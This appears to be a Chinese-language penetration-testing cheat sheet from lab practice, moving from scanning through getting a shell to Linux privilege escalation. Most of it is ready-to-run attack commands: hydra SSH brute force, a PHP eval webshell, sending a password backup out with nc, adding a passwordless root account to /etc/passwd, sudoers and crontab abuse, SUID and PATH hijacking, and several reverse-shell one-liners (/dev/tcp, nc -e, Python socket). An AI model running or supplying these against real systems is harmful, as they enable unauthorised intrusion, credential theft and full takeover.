type
status
date
slug
summary
tags
category
icon
password
获取shell
ip存活探测:nmap 192.168.245.0/24
指定ip全端口扫描:namp ip -p- -sV -O -sC
框架通过wappalyzer插件查看:
kali搜寻框架漏洞(以drupal为例):
- msfconsole进入后直接search drupal。
某一漏洞模块(exploit/x/x)的详细信息在use exploit/x/x后通过info查看
- 在kali命令行通过searchploit drupal搜寻,此结果与exploit-db.com内容一样。
ssh服务的账户密码爆破(指定账户,一般root或admin):
hydra -l flag4 -P /usr/share/john/password.lst 192.168.245.144 ssh
后台shell:找上传,文件,模板,备份,二次安装,编辑器漏洞相关。
shell后信息收集
首先在网站工作目录(meterpreter>getwd)传入webshell方便管理,写shell
echo "<?=eval(\$_POST['a'])?>">shell.php 查看网站配置文件:
find /var/www/ -name "*config*"find /var/www/ -name "*setting*"收集其他信息:/home /var/mail /var/log
find / -name "*backup*" | grep backup在某文件内通过grep搜寻信息,三个:一个user,一个password,一个root。
用nc将历史密码传入本地主机
nc 192.168.132.139 4445 < old-passwords.bak /etc/shadow密码破解(john):
hydra密码破解:
hydra -l flag4 -P /usr/share/john/password.lst 192.168.245.144 sshshell后提权
linux提权总结 https://xz.aliyun.com/t/7924#toc-20
获取交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'若想对一个文件进行修改然后提权,但此用户无权限,应该想到切换用户,一种是home目录下的用户,一种是webshell上传后的用户。
sudo提权
sudo -l(每个用户的此命令结果可能都不同,都可以试试)出来后的不需要密码就能执行root的命令,可用使用
--help查询帮助信息。比如:
aaa --help若命令可写入内容到文件:
在/etc/passwd文件加入具有root权限的自定义用户名并且不设置密码:
echo 'haha::0:0:root:/root:/bin/bash' >> /etc/passwd
<用户名>:<口令>:<用户标识号>:<组标识号>:<注释性描述>:<主目录>:<登录Shell>切换账户haha即可
echo "charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
然后登录charles账户输入
sudo su root,输入用户密码即可提权成功- 修改/etc/crontab
* * * * * root chmod 4777 /bin/sh然后等一会直接
/bin/shSUID提权:
查询:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;查询出的结果太多怎么办?已知可用的:find nmap less more nano cp mv vi vim bash awk https://xz.aliyun.com/t/12535#toc-14
然后直接将查询结果给gpt,让它去除linux系统命令后返回结果出来,再一个个看文件。
看一个文件通过vim,cat,less,strings(防乱码)等等看看源码有没有执行命令,若执行aaa命令。那我们就新建aaa文件,赋予执行权限加环境变量,执行这个文件就会自动执行我们的aaa文件。具体操作如下(以healthcheck举例):
echo "/bin/bash" > /tmp/aaa
chmod 777 /tmp/aaa
export PATH=/tmp:$PATH
/usr/bin/healthcheck执行:
find /etc/passwd -exec sh \; 通过此命令进入交互whoami试试,如果是root再反弹find /etc/passwd -exec sh -i >& /dev/tcp/192.168.245.132/6666 0>&1 \;find /etc/passwd -exec sh -c 'nc 192.168.245.132 6666 -e /bin/sh' \;find /etc/passwd -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.245.132",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' \;searchsploit
将exp放在poc上在受害机器上下载时,若其他目录不能使用wget,可尝试在/tmp目录下使用
gcc等工具也一样,在tmp目录下尝试